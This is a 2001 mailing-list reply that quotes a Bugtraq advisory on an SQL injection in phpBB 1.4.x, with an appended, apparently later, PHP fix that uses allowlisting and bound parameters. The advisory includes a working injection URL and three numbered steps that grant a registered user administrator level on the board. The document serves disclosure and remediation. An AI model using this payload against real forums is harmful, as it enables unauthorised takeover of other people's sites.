[thelist] phpBB ?

Jeremy Ashcraft ashcraft at 13monkeys.com
Wed Aug 8 16:55:41 CDT 2001


On Wednesday 08 August 2001 15:02, you wrote:
> OK, so now you've got me concerned. We've been using phpBB since about May.
> Our visitors and our staff all think it's just too complicated for most
> users, so it's been a Priority3 item for getting a new one.
>
> So if you can, please define "very large security hole".

This is what popped up on the bugtraq mailing list about it.  Another post
verified this hole in phpBB 1.2.1 also.  Looks like a big hole to me.....

-----Original Message-----
From: kill-9 at modernhackers.com [mailto:kill-9 at modernhackers.com]
Sent: Friday, August 03, 2001 2:51 PM
To: bugtraq at securityfocus.com
Subject: phpBB 1.4.0 bug leads to easy admin privileges


-New phpBB 1.4.x exploit
phpBB is an open source bulletin board created by the phpBB group.
Version 1.4.x of phpBB has a variable input validation problem that can
lead to limited arbitrary SQL queries, including gaining administrative
access to the board.

The problem lies in the fact that phpBB 1.4.x includes an algorithm in
the auth.php file which removes backslashes that php automatically adds
to GPC (Get/Post/Cookie) variables.

<Example code from auth.php>

if(get_magic_quotes_gpc() == 1)
{
   switch($REQUEST_METHOD){
      case "POST":
         // every POST variable becomes a global of the same name,
         // with the slashes that magic_quotes added stripped back out
         while (list ($key, $val) = each ($HTTP_POST_VARS)){
            if( is_array($val) ){
               array_walk($val, 'stripslashes_array', '');
               $$key = $val;
            }
            else{
               $$key = stripslashes($val);
            }
         }
      break;
      /* remaining cases of the switch are not shown in the advisory */
   }
}

</ End example code>


Therefore, certain php variables submitted through a URL can reach an
SQL query with unescaped quotes, which is not good for security reasons.
In the prefs.php file such a situation exists where a user can execute
an arbitrary query by supplying a certain value for the $viewemail
variable.

< Example sql query in prefs.php >

$sql = "UPDATE users SET user_viewemail='$viewemail', user_theme='$themes',
        user_attachsig = '$sig', user_desmile = '$smile', user_html = '$dishtml',
        user_bbcode = '$disbbcode', user_lang = '$lang'
        WHERE (user_id = '$userdata[user_id]')";

</ End example code >


Example URL gives a username "l337h4x0r" level 4 (administrative)
privileges on the board:

<Example URL>

http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23

</ End example URL>

Summary:

1. Register an account on a phpBB board version 1.4.x.
2. Enter above URL with the correct sitename and replace l337h4x0r with
   your username.
3. Click on "Administration Panel" near the bottom of the page.

found by: kill-9 at modernhacker.com
http://www.modernhacker.com
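As an added example (not code from phpBB or from the advisory), here is the prefs.php UPDATE rebuilt the way it should have been written: boolean preferences are checked against the only values the form can send, and every value is bound as a parameter instead of interpolated, so the magic_quotes/stripslashes dance in auth.php no longer matters. It assumes PHP with the PDO sqlite driver; the users table and row are constructed, with the column names taken from the advisory's query.

```php
<?php
// Added example, not code from phpBB or the advisory: the prefs.php UPDATE
// rebuilt so request values are validated and bound as parameters instead of
// being interpolated; magic_quotes and stripslashes then play no part.
// Assumes PDO with the sqlite driver; the users row below is constructed.

function save_prefs(PDO $db, int $user_id, array $req): int
{
    // Boolean preferences: accept only "0" or "1", which is all the form sends.
    $flags = [];
    foreach (['viewemail', 'sig', 'smile', 'dishtml', 'disbbcode'] as $k) {
        $v = (string) ($req[$k] ?? '0');
        if ($v !== '0' && $v !== '1') {
            throw new InvalidArgumentException("$k must be 0 or 1");
        }
        $flags[$k] = (int) $v;
    }
    // Free-form values are bound, never interpolated, so quotes stay data.
    $sql = 'UPDATE users SET user_viewemail = :viewemail, user_theme = :themes,'
         . ' user_attachsig = :sig, user_desmile = :smile, user_html = :dishtml,'
         . ' user_bbcode = :disbbcode, user_lang = :lang WHERE user_id = :uid';
    $stmt = $db->prepare($sql);
    $stmt->execute($flags + [
        'themes' => (string) ($req['themes'] ?? ''),
        'lang'   => (string) ($req['lang'] ?? 'english'),
        'uid'    => $user_id,
    ]);
    return $stmt->rowCount();
}

// Demo: a constructed level-0 user, then the advisory's viewemail value.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER, username TEXT, user_level INTEGER,
    user_viewemail INTEGER, user_theme TEXT, user_attachsig INTEGER,
    user_desmile INTEGER, user_html INTEGER, user_bbcode INTEGER, user_lang TEXT)');
$db->exec("INSERT INTO users VALUES (7, 'alice', 0, 0, '', 0, 0, 0, 0, 'english')");

try {
    save_prefs($db, 7, ['viewemail' => "1',user_level='4' where username='alice'#"]);
} catch (InvalidArgumentException $e) {
    echo "rejected before any SQL ran: {$e->getMessage()}\n";
}
// A quote inside a bound free-form field is stored literally, not executed.
save_prefs($db, 7, ['viewemail' => '1', 'lang' => "en' -- "]);
$row = $db->query('SELECT user_level, user_lang FROM users WHERE user_id = 7')
          ->fetch(PDO::FETCH_ASSOC);
echo "user_level={$row['user_level']} user_lang={$row['user_lang']}\n";
```

The first call is refused by the allowlist check and the second stores the quote-bearing string as plain data, so user_level stays at 0 in both cases.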